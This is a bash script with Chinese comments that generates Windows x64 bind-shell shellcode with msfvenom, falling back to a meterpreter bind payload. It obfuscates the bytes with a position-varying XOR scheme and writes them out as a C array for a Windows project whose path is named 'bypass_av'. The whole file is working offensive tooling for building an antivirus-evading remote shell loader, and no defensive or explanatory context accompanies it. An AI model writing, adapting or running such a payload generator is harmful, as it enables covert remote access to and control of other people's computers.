#!/bin/bash
# ==============================================================
# kali_gen_shellcode.sh — 在 Kali 上生成 bind shell 原始字节码
# ==============================================================
# 用法:
#   chmod +x kali_gen_shellcode.sh
#   ./kali_gen_shellcode.sh <LPORT>
#
# 输出:
#   shellcode.bin — 原始 shellcode (raw bytes)
#   shellcode_encrypted.c — XOR 加密后的 C 数组
#
# 然后将 shellcode_encrypted.c 的内容粘贴到
# Windows 项目的 shellcode_data.h 中
# ==============================================================

set -e

PORT=${1:-4444}
XOR_KEY=0xCE

echo "[*] Generating x64 bind TCP shellcode (port $PORT)..."
msfvenom -p windows/x64/shell_bind_tcp LPORT=$PORT -f raw -o shellcode.bin 2>/dev/null

if [ $? -ne 0 ] || [ ! -f shellcode.bin ]; then
    echo "[!] msfvenom failed. Trying alternate payload..."
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=$PORT -f raw -o shellcode.bin 2>/dev/null
fi

if [ ! -f shellcode.bin ]; then
    echo "[-] Error: msfvenom not found or payload generation failed."
    echo "    Install: sudo apt install metasploit-framework"
    exit 1
fi

SIZE=$(stat -c%s shellcode.bin)
echo "[+] shellcode.bin generated: $SIZE bytes"

# XOR encrypt (same algorithm as embed_frp.py)
python3 -c "
import sys
data = open('shellcode.bin', 'rb').read()
key = $XOR_KEY
enc = bytearray()
for i, b in enumerate(data):
    x = b ^ key
    x ^= (i * 0x13 + 0x57) & 0xFF
    enc.append(x)

# Output as C array
with open('shellcode_encrypted.c', 'w') as f:
    f.write('// shellcode_data.h — Encrypted bind shellcode\\n')
    f.write(f'// Generated by kali_gen_shellcode.sh, XOR key: {hex(key)}\\n')
    f.write(f'// Original size: {len(data)} bytes, Payload: windows/x64/shell_bind_tcp LPORT=$PORT\\n')
    f.write('#pragma once\\n#include <windows.h>\\n\\n')
    f.write('static const BYTE g_shellcode_enc[] = {\\n')
    for i in range(0, len(enc), 12):
        chunk = enc[i:i+12]
        hex_str = ', '.join(f'0x{b:02X}' for b in chunk)
        comma = ',' if i + 12 < len(enc) else ''
        f.write(f'    {hex_str}{comma}\\n')
    f.write('};\\n')
    f.write(f'static SIZE_T g_shellcode_enc_len = sizeof(g_shellcode_enc);\\n')

print(f'[+] Encrypted C array: shellcode_encrypted.c ({len(enc)} bytes)')
print(f'[+] XOR key: {hex(key)}')
print()
print(f'    Copy shellcode_encrypted.c to Windows project as shellcode_data.h')
print()
print(f'    Or manually: scp shellcode_encrypted.c user@windows_ip:<path>\\\\bypass_av\\\\shellcode_data.h')
"

ls -la shellcode.bin shellcode_encrypted.c 2>/dev/null
